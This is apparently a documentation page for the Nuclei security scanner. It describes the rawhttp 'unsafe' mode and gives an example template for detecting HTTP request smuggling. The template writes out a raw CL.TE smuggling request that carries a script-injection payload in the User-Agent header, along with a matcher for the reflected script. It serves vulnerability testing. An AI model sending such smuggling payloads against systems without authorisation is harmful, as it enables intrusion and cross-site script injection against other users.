Nuclei supports rawhttp for complete request control and customization allowing any kind of malformed requests for issues like HTTP request smuggling, Host header injection, CRLF with malformed characters and more.

rawhttp library is disabled by default and can be enabled by including unsafe: true in the request block.

Here is an example of HTTP request smuggling detection template using rawhttp.

http:
  - raw:
    - |+
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 150
        Transfer-Encoding: chunked

        0

        GET /post?postId=5 HTTP/1.1
        User-Agent: a"/><script>alert(1)</script>
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 5

        x=1
    - |+
        GET /post?postId=5 HTTP/1.1
        Host: {{Hostname}}

    unsafe: true # Enables rawhttp client
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<script>alert(1)</script>")'

Was this page helpful?

Payloads ExamplesValue Sharing